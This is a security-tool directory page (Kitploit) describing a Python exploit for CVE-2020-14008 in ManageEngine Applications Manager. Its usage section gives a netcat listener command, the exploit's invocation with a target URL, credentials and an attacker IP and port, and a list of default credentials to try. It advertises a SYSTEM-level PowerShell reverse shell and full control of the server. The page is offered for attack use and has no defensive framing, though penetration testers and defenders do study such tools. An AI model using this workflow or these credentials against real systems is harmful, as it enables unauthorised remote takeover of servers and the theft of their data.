Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2020-14008 — Python exploit for CVE-2020-14008 in ManageEngine Applications Manager delivering a SYSTEM-level reverse shell via authenticated remote code execution. | Kitploit
Tools/GitHubGitHub/jackhars/cve-2020-14008
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjackhars/cve-2020-14008

cve-2020-14008

Python exploit for CVE-2020-14008 in ManageEngine Applications Manager delivering a SYSTEM-level reverse shell via authenticated remote code execution.

View Repository
421 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-14008 ManageEngine Exploit

What is this?

This script exploits CVE-2020-14008 in ManageEngine Applications Manager to get a reverse shell with SYSTEM privileges.

Requirements

root@kitploit:~
pip3 install requests urllib3

How to use it

1. Start a listener

root@kitploit:~
nc -nlvp 9001

2. Run the exploit

root@kitploit:~
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>

Examples

root@kitploit:~
# Direct attack
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001

# Through port forwarding
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001

Common credentials to try

  • admin:admin
  • administrator:administrator
  • guest:guest

What you get

  • PowerShell reverse shell
  • SYSTEM privileges on the target
  • Full control of the ManageEngine server
Download Tool